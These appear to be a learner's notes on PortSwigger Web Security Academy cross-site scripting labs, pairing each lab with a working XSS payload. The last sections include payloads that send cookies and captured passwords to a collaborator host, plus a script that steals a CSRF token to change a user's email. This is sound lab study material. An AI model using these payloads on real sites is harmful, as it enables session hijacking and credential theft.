Cross Site Scripting (XSS)

sible XSS Payload

GitHub - payloadbox/xss-payload-list: 🎯 Cross Site Scripting ( XSS ) Vulnerability Payload ListGitHub

PayloadsAllTheThings/XSS Injection/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

Potential Vector

hashchange

<iframe src="https://0aa7008a038f15ccb09c4c4900c000e7.web-security-academy.net/#" onload=print(1)>

String Arithmatic

'-alert(1)-'

AngularJS

If the part has ng-app, it is possible to get DOM XSS.

{{ this.constructor.constructor('alert("foo")')() }}

Random Payloads

\"-alert(1)}//
<><img src=1 onload=alert(1)>
\'-alert(1)//

jQuery anchor href attribute using location.search source

<script>
    $(function() {
        $('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
    });
</script>

jQuery selector sink using a hashchange event

$(window).on('hashchange', function() {
	var element = $(location.hash);
	element[0].scrollIntoView();
});

Payload

<iframe src="https://0a1e008804b81db380f803e800fb0029.web-security-academy.net#" onload="this.src+='<img src=1 onerror=print()>'">

XSS with AngularJS

Must have ng-app attribute on HTML element

Payload

PayloadsAllTheThings/XSS Injection/5 - XSS in Angular.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Reflected DOM XSS

Under the search got another script that is being run

This request will be sent each time we are searching for something

Payload

\"-alert(1)}//

Stored DOM XSS

There is this script that will run when displaying the comments

There is a escape HTML function being used

The function is being used at the author portion of the form

Payload

<><img src=1 onerror=alert(1)>

Reflected XSS into attribute with angle brackets HTML-encoded

We will realised that the > and < are HTML encoded

Payload

Just put this in the search bar to trigger the XSS

" autofocus onfocus=alert(document.domain) x="

Stored XSS into anchor href attribute with double quotes HTML-encoded

We can see that whatever we put into the website portion, it will get reflected out, in this case http://test

Payload

javascript:alert(1)

Canonical Link Tag

In the source, we can see that there is a rel="canonical" attribute in the source code

We can also add anything behind and it will be reflected

Payload

Just add the accesskey and onclick attribute at the back

https://0a3900ff04d5fcf4cb883c560075002d.web-security-academy.net/?%27accesskey=%27X%27onclick=%27alert(1)%27

Reflected XSS into a Javascript string with single quote and backslash escaped

We can see that any input that we give the search bar, it will be reflected on the source on the page

Payload

We will need to escape the <script> tag to trigger the XSS

';</script><img src=1 onerror=alert(1)>'

Reflected XSS into a JavaScript string with angle brackets HTML encoded

Similar to the previous lab, whatever gets put into the search bar, will be reflected on the source

Payload

'-alert(1)//

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

Similar to the previous lab, whatever gets put into the search bar, will be reflected on the source

Payload

It needs to escape the string to treat it as a single quote

\'-alert(1)//

Stored XSS into onclick event with angle bracket and double quotes HTML-encoded an single quotes and backslash escaped

The website field will reflect out in the onclick attribute

Payload

http://foo?'-alert(1)-'

Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped

We can see that the search term gets reflected in the <script> tag below

Payload

${alert(document.domain)}

Exploiting cross-site scripting to steal cookies

The Comment field is vulnerable to XSS

Payload

<script>document.location="http://<COLLABORATOR URL>?c="+document.cookie</script>

Exploiting cross-site scripting to capture password

Same as the previous lab, the Comment section is vulnerable to XSS

Payload

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

Exploiting XSS to bypass CSRF defenses

Same as the previous lab, the Comment field is vulnerable to XSS

Payload

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>